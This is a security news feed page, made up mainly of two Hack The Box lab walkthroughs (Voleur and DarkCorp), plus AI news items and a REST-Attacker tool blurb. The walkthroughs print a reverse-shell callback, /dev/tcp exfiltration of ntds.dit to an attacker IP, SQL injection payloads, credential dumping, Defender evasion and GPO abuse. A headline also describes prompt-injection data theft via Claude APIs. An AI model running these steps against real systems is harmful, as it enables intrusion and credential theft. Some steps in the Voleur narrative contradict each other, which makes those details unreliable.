HackRead
- Quttera Launches “Evidence-as-Code” API to Automate Security Compliance for SOC 2 and PCI DSS v4.0
OpenAI API User Data Exposed in Mixpanel Breach, ChatGPT Unaffected
Anthropic introduces cheaper, more powerful, more efficient Opus 4.5 model
Anthropic today released Opus 4.5, its flagship frontier model, and it brings improvements in coding performance, as well as some user experience improvements that make it more generally competitive with OpenAI’s latest frontier models.
Perhaps the most prominent change for most users is that in the consumer app experiences (web, mobile, and desktop), Claude will be less prone to abruptly hard-stopping conversations because they have run too long. The improvement to memory within a single conversation applies not just to Opus 4.5, but to any current Claude models in the apps.
Users who experienced abrupt endings (despite having room left in their session and weekly usage budgets) were hitting a hard 200,000-token context window. Whereas some large language model implementations quietly trim earlier messages from the context once a conversation exceeds the window, Claude ended the conversation outright rather than let the user sit through an increasingly incoherent exchange in which the model forgets things based on how old they are.


Google tells employees it must double capacity every 6 months to meet AI demand
While AI bubble talk fills the air these days, with fears of overinvestment that could pop at any time, something of a contradiction is brewing on the ground: Companies like Google and OpenAI can barely build infrastructure fast enough to fill their AI needs.
During an all-hands meeting earlier this month, Google’s AI infrastructure head Amin Vahdat told employees that the company must double its serving capacity every six months to meet demand for artificial intelligence services, reports CNBC. The comments offer a rare look at what Google executives are telling their own employees internally. Vahdat, a vice president at Google Cloud, presented slides showing the company needs to scale “the next 1000x in 4-5 years.”
While a thousandfold increase in compute capacity sounds ambitious by itself (doubling every six months compounds to 2^8-2^10, or roughly 250-1,000x, over four to five years), Vahdat noted some key constraints: Google needs to deliver this increase in capability, compute, storage, and networking “for essentially the same cost and increasingly, the same power, the same energy level,” he told employees during the meeting. “It won’t be easy but through collaboration and co-design, we’re going to get there.”


OpenAI walks a tricky tightrope with GPT-5.1’s eight new personalities
On Wednesday, OpenAI released GPT-5.1 Instant and GPT-5.1 Thinking, two updated versions of its flagship AI models now available in ChatGPT. The company is wrapping the models in the language of anthropomorphism, claiming that they’re warmer, more conversational, and better at following instructions.
The release follows complaints earlier this year that OpenAI’s previous models were excessively cheerful and sycophantic, along with an opposing controversy over how the company modified the default GPT-5 output style after several lawsuits related to user suicides.
The company now faces intense scrutiny from lawyers and regulators that could threaten its future operations. In that kind of environment, it’s difficult to just release a new AI model, throw out a few stats, and move on like the company could even a year ago. But here are the basics: The new GPT-5.1 Instant model will serve as ChatGPT’s faster default option for most tasks, while GPT-5.1 Thinking is a simulated reasoning model that attempts to handle more complex problem-solving tasks.


SesameOp Backdoor Abused OpenAI Assistants API for Remote Access
Claude AI APIs Can Be Abused for Data Exfiltration
An attacker can inject indirect prompts to trick the model into harvesting user data and sending it to the attacker’s account.
The post Claude AI APIs Can Be Abused for Data Exfiltration appeared first on SecurityWeek.
Hack The Box: Voleur Machine Walkthrough – Medium Difficulty
Introduction to Voleur:

In this write-up, we will explore the “Voleur” machine from Hack The Box, categorised as a medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Voleur” machine from Hack The Box by achieving the following objectives:
User Flag:
I found a password-protected Excel file on an SMB share, cracked it to recover service-account credentials, used those credentials to obtain Kerberos access and log into the victim account, and then opened the user’s Desktop to read user.txt.
Root Flag:
I used recovered service privileges to restore a deleted administrator account, extracted that user’s encrypted credential material, decrypted it to obtain higher-privilege credentials, and used those credentials to access the domain controller and read root.txt.
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial -Pn 10.10.11.76
Nmap Output:
┌─[dark@parrot]─[~/Documents/htb/voleur]
└──╼ $nmap -sC -sV -oA initial -Pn 10.10.11.76
# Nmap 7.94SVN scan initiated Thu Oct 30 09:26:48 2025 as: nmap -sC -sV -oA initial -Pn 10.10.11.76
Nmap scan report for 10.10.11.76
Host is up (0.048s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-30 20:59:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-10-30T20:59:25
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h32m19s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 30 09:27:43 2025 -- 1 IP address (1 host up) scanned in 55.54 seconds
Analysis:
- 53/tcp: DNS (Simple DNS Plus) – domain name resolution
- 88/tcp: Kerberos – Active Directory authentication service
- 135/tcp: MSRPC – Windows RPC endpoint mapper
- 139/tcp: NetBIOS-SSN – legacy file and printer sharing
- 389/tcp: LDAP – Active Directory directory service
- 445/tcp: SMB – file sharing and remote administration
- 464/tcp: kpasswd – Kerberos password change service
- 593/tcp: RPC over HTTP – remote procedure calls over HTTP
- 636/tcp: tcpwrapped – likely LDAPS (secure LDAP)
- 2222/tcp: SSH – OpenSSH on Ubuntu (remote management)
- 3268/tcp: Global Catalog (LDAP GC) – forest-wide directory service
- 3269/tcp: tcpwrapped – likely Global Catalog over LDAPS
Machine Enumeration:

impacket-getTGT voleur.htb/ryan.naylor:HollowOct31Nyt (Impacket v0.12.0) — TGT saved to ryan.naylor.ccache; note: significant clock skew with the DC may disrupt Kerberos operations.

impacket-getTGT used ryan.naylor’s credentials to request a Kerberos TGT from the domain KDC and saved it to ryan.naylor.ccache. That ticket lets anyone request service tickets and access AD services (SMB, LDAP, HTTP) as ryan.naylor until it expires or is revoked, so inspect it with KRB5CCNAME=./ryan.naylor.ccache klist and, if the request was unauthorized, reset the account password and check KDC logs for suspicious AS-REQs.

Exporting KRB5CCNAME=./ryan.naylor.ccache tells the Kerberos libraries to use that credential cache file for authentication, so Kerberos-aware tools (klist, smbclient -k, ldapsearch -Y GSSAPI, Impacket tools with -k) will present the saved TGT; after exporting, run klist to view the ticket timestamps, then use the desired Kerberos-capable client (and unset the variable when done).
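A minimal sequence, assuming the ccache sits in the current directory:

export KRB5CCNAME=./ryan.naylor.ccache
klist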

nxc ldap connected to the domain controller’s LDAP (DC.voleur.htb:389) using Kerberos (-k), discovered AD info (x64 DC, domain voleur.htb, signing enabled, SMBv1 disabled) and successfully authenticated as voleur.htb\ryan.naylor with the supplied credentials, confirming those credentials are valid for LDAP access.

nxc smb connected to the domain controller on TCP 445 using Kerberos (-k), enumerated the host as dc.voleur.htb (x64) with SMB signing enabled and SMBv1 disabled, and successfully authenticated as voleur.htb\ryan.naylor with the supplied credentials, confirming SMB access to the DC that can be used to list or mount shares, upload or download files, or perform further AD discovery as far as the account’s privileges allow.
Bloodhound enumeration

Runs bloodhound-python to authenticate to the voleur.htb domain as ryan.naylor (using the provided password and Kerberos via -k), query the specified DNS server (10.10.11.76), collect all AD data (-c All) across the domain (-d voleur.htb), and package the resulting JSON into a zip file (--zip) ready for import into BloodHound for graph-based AD attack-path analysis. This gathers users, groups, computers, sessions, ACLs, trusts, and other relationships that are sensitive, so only run it with authorization.
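Reconstructed from the options described above, the command would have looked roughly like this (adjust flags to your bloodhound-python version):

bloodhound-python -u ryan.naylor -p 'HollowOct31Nyt' -k -d voleur.htb -ns 10.10.11.76 -c All --zip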

ryan.naylor is a member of Domain Users and First-line Technicians. Domain Users is the default domain account group with standard user privileges, while First-line Technicians is a delegated helpdesk/tech group that typically has elevated rights like resetting passwords, unlocking accounts, and limited workstation or AD object management. Combined, these memberships let the account perform routine IT tasks and make it a useful foothold for lateral movement or privilege escalation if abused, so treat it as sensitive and monitor or restrict it as needed.
SMB enumeration

Connected to dc.voleur.htb over SMB using Kerberos authentication; authenticated as voleur.htb\ryan.naylor and enumerated shares: ADMIN$, C$, Finance, HR, IPC$ (READ), IT (READ), NETLOGON (READ), and SYSVOL (READ), with SMB signing enabled and NTLM disabled.

If impacket-smbclient -k dc.voleur.htb failed, target a specific share and provide credentials or use your Kerberos cache. For example, after exporting KRB5CCNAME=./ryan.naylor.ccache, connect with Kerberos and no password: impacket-smbclient -k -no-pass dc.voleur.htb; or authenticate to a known share directly with Samba’s smbclient: smbclient //dc.voleur.htb/Finance -U 'ryan.naylor%HollowOct31Nyt'. Specifying the share usually succeeds when the root endpoint refuses connections.

Shares need to be selected from the enumerated list before accessing them.

The SMB session showed available shares (including hidden admin shares ADMIN$ and C$, domain shares NETLOGON and SYSVOL, and user shares like Finance, HR, IT); the command use IT switched into the IT share and ls will list that share’s files and directories — output depends on ryan.naylor’s permissions and may be empty or restricted if the account lacks write/list rights.

Directory listing shows a folder named First-Line Support — change into it with cd First-Line Support and run ls to view its contents.

Inside the First-Line Support folder, there is a single file named Access_Review.xlsx with a size of 16,896 bytes, along with the standard . and .. directories.

Retrieve or save the Access_Review.xlsx file from the share to the local system.

Saved the file locally on your machine.

The file Access_Review.xlsx is encrypted using CDFv2.

The file is password-protected and cannot be opened without the correct password.

Extracted the password hash from Access_Review.xlsx using office2john and saved it to a file named hash.

The output is the extracted Office 2013 password hash from Access_Review.xlsx in hashcat/John format, showing encryption type, iteration count, salt, and encrypted data, which can be used for offline password cracking attempts.

Hashcat could not identify any supported hash mode that matches the format of the provided hash.

CrackStation failed to find a viable cracking path.

After researching the hash, it’s confirmed as Office 2013 / CDFv2 (PBKDF2-HMAC-SHA1 with 100,000 iterations), which maps to hashcat mode 9600; use hashcat -m 9600 with targeted wordlists, masks, or rules (GPU recommended), but expect slow hashing due to the high iteration count. If hashcat rejects the format, update to the latest hashcat build or fall back to John the Ripper via office2john; only attempt cracking with proper authorization.
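As a sketch, the extract-and-crack sequence would look like this (assuming the usual rockyou.txt wordlist location):

office2john Access_Review.xlsx > hash
hashcat -m 9600 hash /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash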

I found this guide on Medium that explains how to extract and crack the Office 2013 hash we retrieved.


Password enumeration identified the credential football1, potentially belonging to a service account. Notably, the Todd user had been deleted, yet its password remnants were still recoverable.

The Access_Review.xlsx file contained plaintext credentials for two service accounts: svc_ldap — M1XyC9pW7qT5Vn and svc_iis — N5pXyV1WqM7CZ8. These appear to be service-account passwords that could grant LDAP and IIS access; treat them as sensitive, rotate/reset the accounts immediately, and audit where and how the credentials were stored and used.

svc_ldap has GenericWrite over the Lacey user object and WriteSPN on svc_winrm; the next step is to request a service ticket for svc_winrm.

impacket-getTGT used svc_ldap’s credentials to perform a Kerberos AS-REQ to the domain KDC, received a valid TGT, and saved it to svc_ldap.ccache; that TGT can be used to request service tickets (TGS) and access domain services as svc_ldap until it expires or is revoked, so treat the ccache as a live credential and rotate/reset the account or investigate KDC logs if the activity is unauthorized.

Set the Kerberos credential cache to svc_ldap.ccache so that Kerberos-aware tools will use svc_ldap’s TGT for authentication.

Attempt to bypass the disabled account failed: no krbtgt entries were found, indicating an issue with the LDAP account used.

Run bloodyAD against voleur.htb as svc_ldap (Kerberos) targeting dc.voleur.htb to set the svc_winrm object’s servicePrincipalName to HTTP/fake.voleur.htb.
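A rough sketch of the WriteSPN abuse with bloodyAD, followed by a targeted Kerberoast with impacket’s GetUserSPNs (flag spellings may vary across tool versions):

bloodyAD -k --host dc.voleur.htb -d voleur.htb -u svc_ldap set object svc_winrm servicePrincipalName -v 'HTTP/fake.voleur.htb'
impacket-GetUserSPNs -k -no-pass -dc-host dc.voleur.htb voleur.htb/svc_ldap -request-user svc_winrm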

The hashes were successfully retrieved as shown previously.


Cracking failed when hashcat hit a segmentation fault.

Using John the Ripper, the Office hash was cracked and the password AFireInsidedeOzarctica980219afi was recovered — treat it as a live credential and use it only with authorization (e.g., to open the file or authenticate as the associated account).

Authenticate with kinit using the cracked password, then run evil-winrm to access the target.
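For example, assuming /etc/krb5.conf is configured for the VOLEUR.HTB realm:

kinit svc_winrm@VOLEUR.HTB
evil-winrm -i dc.voleur.htb -r voleur.htb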

To retrieve the user flag, run type user.txt in the compromised session.
Another way to retrieve user flag

Request a TGS for the svc_winrm service principal.

Use evil-winrm the same way as before to connect and proceed.

Alternatively, display the user flag with type C:\Users\<username>\Desktop\user.txt.
Escalate to Root Privileges
Privilege Escalation:

Enumerated C:\ and found an IT folder that warrants closer inspection.

The IT folder contains three directories — each checked next for sensitive files.

No relevant files or artifacts discovered so far.


The directories cannot be opened with the current permissions.

Runs bloodyAD against dc.voleur.htb as svc_ldap (authenticating with the given password and Kerberos) to enumerate all Active Directory objects that svc_ldap can write to; the get writable command lists objects with writable ACLs (e.g., GenericWrite, WriteSPN), and --include-del also returns deleted-object entries, revealing targets you can modify or abuse for privilege escalation (resetting attributes, writing SPNs, planting creds, etc.).
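The command would look something like:

bloodyAD -k --host dc.voleur.htb -d voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' get writable --include-del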

From the list of writable AD objects, locate the object corresponding to Todd Wolfe.

Located the object; proceed to restore it by assigning sAMAccountName todd.wolfe.

Runs bloodyAD against dc.voleur.htb as svc_ldap (Kerberos) to restore the deleted AD object todd.wolfe on the domain — this attempts to undelete the tombstoned account and reinstate its sAMAccountName; success depends on svc_ldap having sufficient rights and the object still being restorable.
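A sketch of the restore using bloodyAD’s set restore subcommand (Kerberos auth via the exported ccache):

bloodyAD -k --host dc.voleur.htb -d voleur.htb -u svc_ldap set restore todd.wolfe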

The restoration was successful, so the next step is to verify whether the original password still works.

After evaluating options, launch runascs.exe to move forward with the attack path.

Execute RunasCS.exe to run powershell as svc_ldap using password M1XyC9pW7qT5Vn and connect back to 10.10.14.189:9007.
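Using RunasCS’s -r redirect option, the invocation would be roughly:

.\RunasCS.exe svc_ldap M1XyC9pW7qT5Vn powershell.exe -r 10.10.14.189:9007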

Established a reverse shell session from the callback.

Successfully escalated to and accessed the system as todd.wolfe.

Ultimately, all previously restricted directories are now visible.





You navigated into the IT share (Second-Line Support → Archived Users → todd.wolfe) and downloaded two DPAPI-related artefacts: the master-key blob at AppData\Roaming\Microsoft\Protect\<SID>\08949382-134f-4c63-b93c-ce52efc0aa88 and the credential file at AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3. These DPAPI master-key/credential blobs can be used to recover saved secrets for todd.wolfe when combined with the appropriate user or system keys, so treat them as highly sensitive.
DPAPI Recovery and Abuse: How Encrypted Blobs Lead to Root

Using impacket-dpapi with todd.wolfe’s masterkey file and password (NightT1meP1dg3on14), the DPAPI master key was successfully decrypted; the output shows the master key GUID, lengths, and flags, with the decrypted key displayed in hex, which can now be used to unlock the user’s protected credentials and recover saved secrets from Windows.

The credential blob was decrypted successfully: it’s an enterprise-persisted domain password entry last written on 2025-01-29 12:55:19 for target Jezzas_Account with username jeremy.combs and password qT3V9pLXyN7W4m; the flags indicate it requires confirmation and supports wildcard matching. This is a live domain credential that can be used to authenticate to AD services or for lateral movement, so handle it as sensitive and test access only with authorization.
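A sketch of the two impacket-dpapi steps (the SID placeholder stands for todd.wolfe’s SID from the Protect folder, and the -key value is the hex master key recovered in the first step):

impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid <todd.wolfe-SID> -password 'NightT1meP1dg3on14'
impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0x<decrypted-masterkey>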

impacket-getTGT used jeremy.combs’s credentials to request a Kerberos TGT from the domain KDC and saved it to jeremy.combs.ccache; that TGT can be used to request service tickets (TGS) and authenticate to AD services (SMB, LDAP, WinRM, etc.) as jeremy.combs until it expires or is revoked, so inspect it with KRB5CCNAME=./jeremy.combs.ccache && klist and treat the cache as a live credential — rotate/reset the account or review KDC logs if the activity is unauthorized.

Set the Kerberos credential cache to jeremy.combs.ccache so Kerberos-aware tools will use jeremy.combs’s TGT for authentication.

Run bloodhound-python as jeremy.combs (password qT3V9pLXyN7W4m) using Kerberos and DNS server 10.10.11.76 to collect all AD data for voleur.htb and save the output as a zip for BloodHound import.

Account jeremy.combs is in the Third-Line Technicians group.

Connected to dc.voleur.htb with impacket-smbclient (Kerberos), switched into the IT share and listed contents — the directory Third-Line Support is present.

Downloaded two files from the share: the private SSH key id_rsa and the text file Note.txt.txt — treat id_rsa as a sensitive private key (check for a passphrase) and review Note.txt.txt for useful creds or instructions.

The note indicates that the administrator was dissatisfied with Windows Backup and has started configuring Windows Subsystem for Linux (WSL) to experiment with Linux-based backup tools. They are asking Jeremy to review the setup and implement or configure any viable backup solutions using the Linux environment. Essentially, it’s guidance to transition or supplement backup tasks from native Windows tools to Linux-based tools via WSL.


The key belongs to the svc_backup user, and based on the earlier port scan, port 2222 is open, which can be used to attempt a connection.
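For example:

ssh -i id_rsa -p 2222 svc_backup@10.10.11.76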

The only difference in this case is the presence of the backups directory.

There are two directories present: Active Directory and Registry.

Stream the raw contents of the ntds.dit file to a remote host by writing it out over a TCP connection.

The ntds.dit file was transferred to the remote host.

Stream the raw contents of the SYSTEM file to a remote host by writing it out over a TCP connection.

The SYSTEM file was transferred to the remote host.
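A minimal sketch of such a transfer using bash’s /dev/tcp device (the listening port 9008 is illustrative); repeat with SYSTEM in place of ntds.dit:

nc -lvnp 9008 > ntds.dit (on the attacker machine)
cat ntds.dit > /dev/tcp/10.10.14.189/9008 (on the target, from the backups directory)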

That command runs impacket-secretsdump in offline mode against the dumped AD database and system hive — reading ntds.dit and SYSTEM to extract domain credentials and secrets (user NTLM hashes, cached credentials, machine account hashes, LSA secrets, etc.) for further offline analysis; treat the output as highly sensitive and use only with proper authorization.
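The offline dump would look like:

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL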

Acquire an Administrator service ticket for WinRM access.

Authenticate with kinit using the cracked password, then run evil-winrm to access the target.

To retrieve the root flag, run type root.txt in the compromised session.
The post Hack The Box: Voleur Machine Walkthrough – Medium Difficulty appeared first on Threatninja.net.
Advanced Serverless Security: Zero Trust Implementation with AI-Powered Threat Detection
Hack The Box: DarkCorp Machine Walkthrough – Insane Difficulty
Introduction to DarkCorp:

In this writeup, we will explore the “DarkCorp” machine from Hack The Box, categorized as an Insane difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “DarkCorp” machine from Hack The Box by achieving the following objectives:
User Flag:
Gained initial foothold via the webmail/contact vector, registered an account, abused the contact form, and executed a payload to spawn a reverse shell. From the shell, read user.txt to capture the user flag.
Root Flag:
Performed post-exploitation and credential harvesting (SQLi → hashes → cracked password thePlague61780; DPAPI master-key recovery yielded Pack_beneath_Solid9!), used the recovered credentials and privilege-escalation techniques to obtain root, then read root.txt to capture the root flag.
Enumerating the DarkCorp Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial 10.10.11.54
Nmap Output:
┌─[dark@parrot]─[~/Documents/htb/darkcorp]
└──╼ $nmap -sC -sV -oA initial 10.10.11.54
# Nmap 7.94SVN scan initiated Sun Aug 17 03:07:38 2025 as: nmap -sC -sV -oA initial 10.10.11.54
Nmap scan report for 10.10.11.54
Host is up (0.18s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
|_ 256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
80/tcp open http nginx 1.22.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 17 03:08:04 2025 -- 1 IP address (1 host up) scanned in 25.73 seconds
┌─[dark@parrot]─[~/Documents/htb/darkcorp]
└──╼ $
Analysis:
- Port 22 (SSH): OpenSSH 9.2p1 on Debian — secure remote access; check for password authentication or weak credentials.
- Port 80 (HTTP): nginx 1.22.1 — web server serving GET/HEAD only; perform directory and file enumeration for further insights.
Web Enumeration:

Nothing noteworthy was found on the website itself.

A subdomain was discovered that leads to the DripMail Webmail interface.
Register a new account and enter the email

As a next step, proceed to register a new account.

Enter the required information to create the new account.

We successfully created the account, confirming that the DripMail Webmail portal’s registration process works and that user registration is open. We can therefore interact with the mail system, which may enable further exploration, including login, email sending, and service enumeration.
Check your email inbox

A new email appeared in the inbox from no-reply@drip.htb, indicating that the system had sent an automated message; it may contain a verification notice, onboarding information, or credential-related details, all worth reviewing for further clues.

However, it turned out to be just a welcome email from no-reply@drip.htb, providing no useful information.
Contact Form Exploitation

The site includes a contact form that attackers could potentially exploit.

We entered a random key value into the input.

We sent the message successfully, confirming that the contact form works and accepts submissions.
CVE‑2024‑42009 — Web Enumeration with Burp Suite

Burp shows the contact form submission (POST) carrying the random key and payload, followed by a successful response.

We modified the contact-form recipient field and replayed the POST via Burp Repeater; the server returned 200 OK, and it delivered the message to admin@drip.htb.

We received a request for customer information.

Let’s start our listener
Contact Form Payload

Insert the base64-encoded string into the message.

The Burp Suite trace looks like the following.



A staff member sent an email.
Resetting the password

We need to change the password.

After setting the payload, we received a password reset link.

Let’s change the password as needed

We are provided with a dashboard.
SQL injection discovered on dev-a3f1-01.drip.htb.

We accessed the user overview and discovered useful information.

The application is vulnerable to SQL injection.
SQLi Payload for Table Enumeration

The input is an SQL injection payload that closes the current query and injects a new one: it terminates the original statement, runs
SELECT table_name FROM information_schema.tables WHERE table_schema='public';
and uses -- to comment out the remainder. This enumerates all table names in the public schema; the response (Users, Admins) shows the database exposed those table names, confirming successful SQLi and information disclosure.

The payload closes the current query and injects a new one:
SELECT column_name FROM information_schema.columns WHERE table_name='Users';--
which lists all column names for the Users table. The response (id, username, password, email, host_header, ip_address) confirms successful SQLi-driven schema enumeration and reveals sensitive columns (notably password and email) that could enable credential or user-data disclosure.

Obtained password hashes from the Users table (Users.password). These values are opaque; we should determine their type, attempt to crack only with authorisation, and protect them securely.
PostgreSQL File Enumeration

The SQL command SELECT pg_ls_dir('./'); invokes PostgreSQL’s pg_ls_dir() function to list all files and directories in the server process’s current directory (typically the database data or working directory). Because pg_ls_dir() exposes the filesystem view, it can reveal configuration files or other server-side files accessible to the database process — which is why it’s often used during post‑exploitation or SQLi-driven reconnaissance. Importantly, this function requires superuser privileges; therefore, a non‑superuser connection will be denied. Consequently, successful execution implies that the user has elevated database permissions.

The SQL command SELECT pg_read_file('PG_VERSION', 0, 200); calls PostgreSQL’s pg_read_file() to read up to 200 bytes starting at offset 0 from the file PG_VERSION on the database server. PG_VERSION normally contains the PostgreSQL version string, so a successful call discloses the DB version to the attacker — useful for fingerprinting — and typically requires superuser privileges, making its successful execution an indicator of elevated database access and a potential information‑disclosure risk.

Traversing back up the directory tree with ../../ sequences revealed a familiar path; anyone who has beaten HTB’s Cerberus machine will recognize the SSSD directories.


SSSD maintains its own local ticket credential caching mechanism (KCM), managed by the SSSD process. It stores a copy of the valid credential cache in /var/lib/sss/secrets/secrets.ldb, while the corresponding encryption key is stored separately in /var/lib/sss/secrets/.secrets.mkey.
Shell as postgres

Finally, we successfully received a reverse shell connection back to our machine; therefore, this confirmed that the payload executed correctly and established remote access as intended.

Nothing of significance was detected.

Discovered the database username and password.
Restore the Old email

Elevate the current shell to an interactive TTY.
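The classic Python trick works here, assuming python3 is present on the host:

python3 -c 'import pty; pty.spawn("/bin/bash")'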

The encrypted PostgreSQL backup dev-dripmail.old.sql.gpg is decrypted using the provided passphrase, and the resulting SQL dump is saved as dev-dripmail.old.sql. Consequently, this allows further inspection or restoration of the database for deeper analysis or recovery.

The output resembles what is shown above.


Found three hashes that can be cracked with Hashcat.

Hash Cracking via hashcat


We successfully recovered the password thePlague61780.

Since Hashcat managed to crack only one hash, we’ll use CrackStation to attempt the remaining two.
Bloodhound enumeration


Update the configuration file.
SSH as ebelford user

Established an SSH session to the machine as ebelford.

No binary found

Found two IP addresses and several subdomains on the target machine.

Update the subdomain entries in our /etc/hosts file.
Network Tunnelling and DNS Spoofing with sshuttle and dnschef

Use sshuttle to connect to the server and route traffic (like a VPN / port forwarding).

Additionally, dnschef was used to intercept and spoof DNS traffic during testing.
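A sketch of the tunnelling setup; the internal subnet shown is illustrative, so substitute the ranges discovered on the host:

sshuttle -r ebelford@drip.htb 172.16.0.0/16
dnschef --fakeip 10.10.14.189 --interface 127.0.0.1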
Gathering Information via Internal Status Monitor

Log in using the victor.r account credentials.


Click the check button to get a response

Replace the saved victor.r login details in Burp Suite.



Testing the suspected host and port for reachability.

Begin the NTLM relay/replay attack.


Leverage socatx64 to perform this activity.
Abuse S4U2Self and Gain a Shell on WEB-01

An LDAP interactive shell session is now running.


Run get_user_groups on svc_acc to list their groups.

Retrieved the SID associated with this action.


Retrieved the administrator.ccache Kerberos ticket.



We can read the user flag by running the type user.txt command.
Escalate to Root Privileges on the DarkCorp Machine
Privilege Escalation:

Transfer sharpdpapi.exe to the target host.


Attempting to evade Windows Defender in a sanctioned test environment

The output reveals a DPAPI-protected credential blob located at C:\Users\Administrator\AppData\Local\Microsoft\Credentials\32B2774DF751FF7E28E78AE75C237A1E. It references a master key with GUID {6037d071-cac5-481e-9e08-c4296c0a7ff7} and shows that the blob is protected using system-level DPAPI (CRYPTPROTECT_SYSTEM), with SHA-512 for hashing and AES-256 for encryption. Since the message indicates the MasterKey GUID is not in cache, decryption cannot proceed until the corresponding master key is obtained, either from the user’s masterkey file or from a process currently holding it in memory.

Direct file transfer through evil-winrm was unsuccessful.


Transform the file into base64 format.
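For example, on the target (filenames illustrative), certutil can do the encoding; rebuild the file locally with base64 -d after stripping the certificate header and footer lines:

certutil -encode C:\Users\Administrator\AppData\Local\Microsoft\Credentials\32B2774DF751FF7E28E78AE75C237A1E cred.b64
type cred.b64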

We successfully recovered the decrypted key, confirming the prior output and enabling further analysis.
Access darkcorp machine via angela.w

Successfully recovered the password Pack_beneath_Solid9!


Retrieval of angela.w’s NT hash failed.


Attempt to gain access to the angela.w account via a different method.

Acquired the hash dump for angela.w.



Save the ticket as angela.w.adm.ccache.



Successful privilege escalation to root.



Retrieved password hashes.


Password reset completed and new password obtained.

Exploiting GPOs with pyGPOAbuse

Enumerated several GPOs in the darkcorp.htb domain; each entry shows the GPO GUID, display name, SYSVOL path, applied extension GUIDs, version, and the policy areas it controls (registry, EFS policy/recovery, Windows Firewall, security/audit, restricted groups, scheduled tasks). The Default Domain Policy and Default Domain Controllers Policy enforce core domain and DC security (the DC policy has many revisions), while the SecurityUpdates GPO appears to manage scheduled tasks and update enforcement. Map these SYSVOL files to find promising escalation vectors: check for misconfigured scheduled tasks, review EFS recovery settings for exposed keys, and identify privileged group memberships; correlate GPO versions and recent changes to prioritize likely targets.




BloodHound identifies taylor as GPO manager — pyGPOAbuse is applicable, pending discovery of the GPO ID.
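If that holds, a pyGPOAbuse invocation would look roughly like this; the password and GPO GUID are placeholders pending discovery, and exact flags should be checked against the tool’s README:

python3 pygpoabuse.py darkcorp.htb/taylor:'<password>' -gpo-id '<GPO-GUID>' -command 'net localgroup administrators taylor /add'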

Force a Group Policy update using gpupdate /force.



Display the root flag with type root.txt.
The post Hack The Box: DarkCorp Machine Walkthrough – Insane Difficulty appeared first on Threatninja.net.
KitPloit
REST-Attacker - Designed As A Proof-Of-Concept For The Feasibility Of Testing Generic Real-World REST Implementations
REST-Attacker is an automated penetration testing framework for APIs following the REST architecture style. The tool's focus is on streamlining the analysis of generic REST API implementations by completely automating the testing process - including test generation, access control handling, and report generation - with minimal configuration effort. Additionally, REST-Attacker is designed to be flexible and extensible with support for both large-scale testing and fine-grained analysis.
REST-Attacker is maintained by the Chair of Network & Data Security of Ruhr University Bochum.
Features
REST-Attacker currently provides these features:
- Automated generation of tests
- Utilize an OpenAPI description to automatically generate test runs
- 32 integrated security tests based on OWASP and other scientific contributions
- Built-in creation of security reports
- Streamlined API communication
- Custom request interface for the REST security use case (based on the Python3 requests module)
- Communicate with any generic REST API
- Handling of access control
- Background authentication/authorization with API
- Support for the most popular access control mechanisms: OAuth2, HTTP Basic Auth, API keys and more
- Easy to use & extend
- Usable as standalone (CLI) tool or as a module
- Adapt test runs to specific APIs with extensive configuration options
- Create custom test cases or access control schemes with the tool's interfaces
Install
Get the tool by downloading or cloning the repository:
git clone https://github.com/RUB-NDS/REST-Attacker.git
You need Python >3.10 to run the tool.
You also need to install the following packages with pip:
python3 -m pip install -r requirements.txt
Quickstart
Here you can find a quick rundown of the most common and useful commands. You can find more information on each command and on other available configuration options in our usage guides.
Get the list of supported test cases:
python3 -m rest_attacker --list
Basic test run (with load-time test case generation):
python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate
Full test run (with load-time and runtime test case generation + rate limit handling):
python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --propose --handle-limits
